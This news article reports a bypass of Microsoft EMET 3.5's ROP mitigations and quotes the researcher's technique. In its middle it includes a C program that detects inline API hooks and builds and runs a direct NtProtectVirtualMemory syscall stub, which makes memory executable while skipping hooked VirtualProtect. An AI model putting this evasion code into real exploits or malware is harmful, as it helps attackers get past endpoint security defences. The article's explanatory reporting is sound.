A security researcher says he has bypassed the ROPGuard protections that won second prize in Microsoft's recent BlueHat Prize contest and were built into EMET 3.5.
According to Ars Technica, security researcher Shahriyar Jalayeri has demonstrated an exploit that defeats the tool's protection. In a blog post, Jalayeri said he had bypassed EMET 3.5 and written a fully functioning exploit for CVE-2011-1260 with all of the Enhanced Mitigation Experience Toolkit's (EMET) ROP mitigations enabled.
According to Microsoft, EMET is a utility that helps prevent vulnerabilities in software from being successfully exploited. Jalayeri explained that EMET's ROP mitigation works by hooking certain APIs (such as VirtualProtect) with the shim engine and monitoring calls to them; a call that does not pass through the hooked API is therefore never inspected.
He said: “I have used SHARED_USER_DATA, which is mapped at the fixed address 0x7FFE0000, to find the KiFastSystemCall address (SystemCallStub at 0x7FFE0300), so I could call any syscall by now.
“By calling ZwProtectVirtualMemory's SYSCALL 0x0D7, I made the shellcode's memory address RWX. After this step I could execute any instruction I wanted. But to execute the actual shellcode (with hooked APIs such as WinExec) I did patch EMET to be deactivated completely.”
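To make the mechanism concrete, the following C program is an added illustration written for this article; it is not code from Jalayeri's blog post and not code from EMET. It shows the two facts his quote relies on: a user-mode hook is visible because it rewrites the first bytes of the API it guards, and the kernel can be reached without that API by assembling the same 15-byte stub 32-bit ntdll uses, which calls through SharedUserData's SystemCallStub at 0x7FFE0300 and never touches VirtualProtect. The syscall number 0x0D7 is the one quoted above and is only valid for NtProtectVirtualMemory on 32-bit Windows 7; the prologue bytes, the address 0x7C801AD4 and the hook offset are constructed samples, and only the guarded section at the end actually executes the stub, on native 32-bit Windows.

```c
/* Added illustration of the bypass quoted above; not Jalayeri's code and not
 * EMET's. Portable C except for the #ifdef'd native 32-bit Windows part. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SHARED_USER_DATA_BASE  0x7FFE0000u                      /* fixed mapping on 32-bit Windows */
#define SYSTEM_CALL_STUB_ADDR  (SHARED_USER_DATA_BASE + 0x300u) /* holds the KiFastSystemCall pointer */
#define SYSCALL_NTPROTECTVIRTUALMEMORY_WIN7_X86 0x0D7u          /* syscall numbers differ per build */

static uint32_t rd32le(const uint8_t *p) { return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24); }
static void wr32le(uint8_t *p, uint32_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }

typedef enum { HOOK_NONE = 0, HOOK_JMP_REL32, HOOK_JMP_ABS_INDIRECT, HOOK_PUSH_RET } hook_kind_t;

/* Classify an API's first bytes (from a copy, so this runs anywhere). A user-mode
 * hook such as EMET's replaces the prologue with a jump into its monitor; va is
 * the API's address and *target receives the jump target (for FF 25, the pointer
 * slot the jump reads). */
hook_kind_t classify_prologue(const uint8_t *p, size_t n, uint32_t va, uint32_t *target)
{
    uint32_t t = 0;
    hook_kind_t k = HOOK_NONE;
    if (n >= 5 && p[0] == 0xE9) {                         /* jmp rel32 (classic detour) */
        t = va + 5u + rd32le(p + 1); k = HOOK_JMP_REL32;  /* wraps mod 2^32 like the CPU */
    } else if (n >= 6 && p[0] == 0xFF && p[1] == 0x25) {  /* jmp dword ptr [abs32] */
        t = rd32le(p + 2); k = HOOK_JMP_ABS_INDIRECT;
    } else if (n >= 6 && p[0] == 0x68 && p[5] == 0xC3) {  /* push imm32 ; ret */
        t = rd32le(p + 1); k = HOOK_PUSH_RET;
    }
    if (target) *target = t;
    return k;
}

/* Emit the 15-byte sequence a 32-bit Windows 7 ntdll Zw* stub uses, for our own
 * syscall number and without touching any export a hook could sit on:
 *   B8 imm32  mov eax, <syscall>        BA imm32  mov edx, 0x7FFE0300
 *   FF 12     call dword ptr [edx]      (KiFastSystemCall: mov edx,esp ; sysenter)
 *   C2 14 00  ret 0x14                  (stdcall: five 4-byte arguments)
 * Returns the number of bytes written, 0 if the buffer is too small. */
size_t build_x86_syscall_stub(uint8_t *out, size_t cap, uint32_t syscall_no)
{
    if (cap < 15) return 0;
    out[0] = 0xB8; wr32le(out + 1, syscall_no);
    out[5] = 0xBA; wr32le(out + 6, SYSTEM_CALL_STUB_ADDR);
    out[10] = 0xFF; out[11] = 0x12;
    out[12] = 0xC2; out[13] = 0x14; out[14] = 0x00;
    return 15;
}

/* Constructed samples, not captured from a real machine: the hot-patchable
 * "mov edi,edi ; push ebp ; mov ebp,esp" prologue kernel32!VirtualProtect starts
 * with on 32-bit Windows, and the same bytes after an inline hook wrote a
 * jmp +0x1000 over them. SAMPLE_VA is an arbitrary load address. */
#define SAMPLE_VA 0x7C801AD4u
const uint8_t SAMPLE_CLEAN_PROLOGUE[5]  = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };
const uint8_t SAMPLE_HOOKED_PROLOGUE[5] = { 0xE9, 0xFB, 0x0F, 0x00, 0x00 };

#if defined(_WIN32) && (defined(_M_IX86) || defined(__i386__))
#include <windows.h>
typedef LONG (__stdcall *nt_protect_vm_t)(HANDLE, PVOID *, SIZE_T *, ULONG, ULONG *);
/* Native 32-bit Windows 7 only: make a region RWX through the raw syscall, so a
 * hook on VirtualProtect never runs. An exploit would obtain executable memory
 * for the stub from its ROP chain; VirtualAlloc (also hooked by EMET) is used
 * here only to keep the demo short. */
LONG direct_protect_rwx(void *addr, SIZE_T len, ULONG *old_prot)
{
    uint8_t code[15]; PVOID base = addr; SIZE_T size = len;
    void *exec = VirtualAlloc(NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec || !build_x86_syscall_stub(code, sizeof code, SYSCALL_NTPROTECTVIRTUALMEMORY_WIN7_X86)) return -1;
    memcpy(exec, code, sizeof code);
    return ((nt_protect_vm_t)exec)(GetCurrentProcess(), &base, &size, PAGE_EXECUTE_READWRITE, old_prot);
}
#endif

int main(void)
{
    uint8_t stub[15];
    uint32_t target = 0;
    size_t i, n;
    hook_kind_t kind = classify_prologue(SAMPLE_CLEAN_PROLOGUE, 5, SAMPLE_VA, &target);
    printf("clean prologue:  kind=%d\n", (int)kind);
    kind = classify_prologue(SAMPLE_HOOKED_PROLOGUE, 5, SAMPLE_VA, &target);
    printf("hooked prologue: kind=%d target=0x%08X\n", (int)kind, (unsigned)target);
    n = build_x86_syscall_stub(stub, sizeof stub, SYSCALL_NTPROTECTVIRTUALMEMORY_WIN7_X86);
    printf("direct-syscall stub:");
    for (i = 0; i < n; i++) printf(" %02X", stub[i]);
    printf("\n");
#if defined(_WIN32) && (defined(_M_IX86) || defined(__i386__))
    { static uint8_t scratch[4096]; ULONG old = 0;
      LONG status = direct_protect_rwx(scratch, sizeof scratch, &old);
      printf("NtProtectVirtualMemory via stub: status=0x%08lX old=0x%lX\n", (unsigned long)status, (unsigned long)old); }
#endif
    return 0;
}
```

Two caveats for anyone reproducing this. The stub hard-codes a syscall number and the SystemCallStub address, so it is tied to native 32-bit Windows 7; a 32-bit process under WOW64 enters the kernel through a different gate (its ntdll calls through fs:[0xC0]) and the number for NtProtectVirtualMemory changes between releases. And the program only shows why the hook is blind to the call: the page becomes RWX without VirtualProtect ever being entered, which is exactly why Jalayeri still had to patch EMET out before calling hooked APIs such as WinExec from the shellcode itself.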
Jalayeri posted assembly code and the exploit on his blog, together with a video showing a Windows 7 machine being compromised by a ROP-based exploit even though it was running EMET 3.5.
ROPGuard was developed by University of Zagreb researcher Ivan Fratric, who won $50,000 (£32,000) for his submission.
Yunsun Wee, director of Microsoft Trustworthy Computing, said in a statement to Ars Technica: “The security mitigation technologies implemented by EMET increase the cost for attackers to develop a successful exploit.”